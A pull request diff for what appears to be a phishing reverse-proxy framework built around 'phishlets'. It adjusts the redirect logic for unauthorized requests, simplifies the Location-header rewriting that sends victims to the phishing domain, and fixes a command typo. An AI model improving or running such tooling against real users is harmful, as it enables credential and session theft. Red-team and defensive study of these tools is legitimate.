### PR TITLE
Redirection fixes and smaller improvements

### DIFF
--- a/core/http_proxy.go
+++ b/core/http_proxy.go
@@ -238,7 +238,7 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
 
 	
 				// redirect for unauthorized requests
-				if ps.SessionId == "" && !req_ok {
+				if ps.SessionId == "" && p.handleSession(req.Host) && !req_ok {
 					redirect_url := p.cfg.redirectUrl
 					resp := goproxy.NewResponse(req, "text/html", http.StatusFound, "")
 					if resp != nil {
@@ -518,8 +518,7 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
 
 			// if "Location" header is present and it is not an intended breakout (ie unauthorized), make sure to redirect to the phishing domain
 			r_url, err := resp.Location()
-			x_overwrite := resp.Header.Get("x-rewrite")
-			if err == nil && x_overwrite == "" {
+			if err == nil && resp.Header.Get("x-rewrite") == "" {
 				if r_host, ok := p.replaceHostWithPhished(r_url.Host); ok {
 					r_url.Host = r_host
 					resp.Header.Set("Location", r_url.String())

--- a/core/terminal.go
+++ b/core/terminal.go
@@ -367,7 +367,7 @@ func (t *Terminal) handlePhishlets(args []string) error {
 			}
 			domain, _ := t.cfg.GetSiteDomain(args[1])
 			if domain == "" {
-				return fmt.Errorf("you need to set hostname for phishlet '%s', first. type: phishlet hostname %s your.hostame.domain.com", args[1], args[1])
+				return fmt.Errorf("you need to set hostname for phishlet '%s', first. type: phishlets hostname %s your.hostame.domain.com", args[1], args[1])
 			}
 			err = t.cfg.SetSiteEnabled(args[1])
 			if err != nil {


### PR DESCRIPTION
- Move warning to only run once 
- Remove debugging, so that unauthorized requests get properly redirected
- Fix redirection (& redirection loop) for unauthorized requests, if the redirect was intended to go to the phished domain
- Fixed wrong instructions